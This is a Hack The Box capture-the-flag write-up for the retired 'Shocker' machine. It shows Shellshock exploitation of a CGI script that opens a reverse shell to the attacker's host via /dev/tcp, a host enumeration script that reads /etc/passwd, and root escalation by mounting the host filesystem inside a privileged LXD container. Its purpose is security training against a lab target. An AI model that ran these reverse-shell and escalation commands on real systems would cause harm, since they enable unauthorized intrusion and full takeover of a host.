This is a writeup for the retired Hack The Box Shocker machine.
- Machine URL: https://www.hacktehbox.com/machines/valentine
- Machine IP: 10.10.10.56
- Time Required: 3h
Solution Summary
The machine is vulnerable to the
Shellshock bug
exposed through a script in the /cgi-bin/ folder in its Apache HTTP server
installation. After gaining access through a reverse shell launched through the
Shellshock bug, the user flag can be read out.
The root file system can be mounted by the local user inside an LXC container,
since they are in the lxd group. With the root file system exposed, the root
flag can be read out.
Solution
To complete the machine, the following steps were performed:
- Run Nmap and identify any potential vulnerabilities.
- Find exposed script files in
/cgi-bin/. - Use the Shellshock vulnerability to launch reverse shell.
- Retrieve the user flag
- Escalate to root privileges using an LXC root file system container bind.
Nmap
We run Nmap and try to identify vulnerabilities.
nmap -oX machines/shocker/nmap.xl -sV -sC --script vuln -A 10.10.10.56
Nmap returns the following (abbreviated) results:
Starting Nmap 7.94 ( https://nmap.org ) at 2024-09-17 07:15 JST
Nmap scan report for 10.10.10.56
Host is up (0.15s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| vulners:
| cpe:/a:apache:http_server:2.4.18:
[...]
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| vulners:
[...]
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 349.44 seconds
Findings:
There are many identified vulnerabilities, but none of those identified have low attack complexity.
HTTP Server
Website served at http://10.10.10.56
Open in new tab
(full image size 20 KiB)
Could “Shocker” be a pun on the Shellshock bug? In order to exploit the Shellshock vulnerability, we would have to have access to a vulnerable CGI script on the Apache HTTP server.
We run gobuster on the HTTP server:
gobuster dir --url http://10.10.10.56 \
--wordlist=SecLists/Discovery/Web-Content/common.txt
gobuster dir --url http://10.10.10.56/cgi-bin/ -t 20 \
--wordlist=SecLists/Discovery/Web-Content/common.txt -x "cgi,sh,pl,py"
For the second scan, we find an interesting file in the cgi-bin folder:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[...]
/user.sh (Status: 200) [Size: 118]
[...]
Shellshock
We use Nmap again to evaluate /cgi-bin/user.sh for the Shellshock
vulnerability, and try to spawn a reverse shell using the following snippet:
bash -i >& /dev/tcp/10.10.16.2/4444 0>&1 & disown
In a separate window, we listen for incoming connections with nc -lvp 4444
and run the following Nmap command:
nmap --script http-shellshock -p80 10.10.10.56 \
--script-args uri=/cgi-bin/user.sh,cmd="/bin/bash -i >& /dev/tcp/10.10.16.2/4444 0>&1 & disown"
Nmap shows us the following (abbreviated) result:
Starting Nmap 7.94 ( https://nmap.org ) at 2024-09-17 09:44 JST
Nmap scan report for 10.10.10.56
Host is up (0.10s latency).
PORT STATE SERVICE
80/tcp open http
| http-shellshock:
| VULNERABLE:
| HTTP Shellshock vulnerability
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2014-6271
| This web application might be affected by the vulnerability known
| as Shellshock. It seems the server is executing commands injected
| via malicious HTTP headers.
|
| Disclosure date: 2014-09-24
| Exploit results:
[...]
|
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
| http://seclists.org/oss-sec/2014/q3/685
| http://www.openwall.com/lists/oss-security/2014/09/24/10
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
Nmap done: 1 IP address (1 host up) scanned in 1.67 seconds
The reverse shell attaches to our machine:
Connection from 10.10.10.56:43486
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$
Screenshot of reverse shell spawned
Open in new tab
(full image size 10 KiB)
We run the enumerate script from Valentine and store the results in
machines/shocker/enumerate.log:
# Adjust it so that it is piped into bash instead
echo '
set -o pipefail
sedscript="1h;1s/./=/gp;x;1p;x;1p"
function run ()
{
echo "BEGIN $1" | sed -n "$sedscript"
if $1 |& cat; then
echo "END $1" | sed -n "$sedscript"
else
echo "FAIL $1" | sed -n "$sedscript"
fi
}
commands=("uname -a"
"whoami"
"hostname"
"cat /etc/os-release"
"lspci -nn"
"lscpu"
"systemctl status"
"ps aux"
"ip link show"
"ip address show"
"ip route show"
"cat /etc/passwd"
"cat /etc/group"
"iptables --list"
"ss -tl")
for command in "${commands[@]}"; do
run "$command"
done
' | bash
Here are some highlights from the enumeration log:
=========================
BEGIN cat /etc/os-release
=========================
NAME="Ubuntu"
VERSION="16.04.3 LTS (Xenial Xerus)"
[...]
It looks like our current user shelly might be able to spawn containers with
LXC:
====================
BEGIN cat /etc/group
====================
[...]
lxd:x:110:shelly
[...]
User flag
First though, we get the user flag:
shelly@Shocker:/usr/lib/cgi-bin$ cd /home/shelly
cd /home/shelly
shelly@Shocker:/home/shelly$ ls
ls
user.txt
shelly@Shocker:/home/shelly$ cat user.txt
cat user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
LXC
We try to launch an LXC container and expose the root file system.
Since we can’t connect to the internet directly from the machine, we have to host it ourselves and serve it using a Python HTTP server.
First, we download the latest Alpine Linux images from https://images.lxd.canonical.com:
wget --directory-prefix=machines/shocker/alpine \
https://images.lxd.canonical.com/images/alpine/3.20/amd64/default/20240917_0017/{lxd.tar.xz,rootfs.squashfs}
We make an HTTP server in the newly created machines/shocker/alpine folder
and remember to open the 8080 TCP port on our machine:
python -m http.server \
--directory machines/shocker/alpine \
--bind 10.10.16.2 8080
On our machine, we can then download the files into the current directory:
curl -O http://10.10.16.2:8080/lxd.tar.xz \
-O http://10.10.16.2:8080/rootfs.squashfs
We then import the images into LXD:
lxc image import $PWD/{lxd.tar.xz,rootfs.squashfs}
The image import completes successfully and we see the following message:
Image imported with fingerprint:
ccaeb52f5433c84653bbfcf2229ea1bd34c6b66afd75a2d3b4e545ec7b60cac6
We run the container using the above fingerprint and spawn a shell:
lxc init ccaeb52f5433c84653bbfcf2229ea1bd34c6b66afd75a2d3b4e545ec7b60cac6 \
pwnage --config security.privileged=true
lxc config device add pwnage host-root disk \
source=/ path=/mnt/root recursive=true
lxc start pwnage
# /bin/bash not available
lxc exec pwnage /bin/sh
Inside the root shell, we run
ls /mnt/root/root
root.txt
cat /mnt/root/root/root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And we have the flag.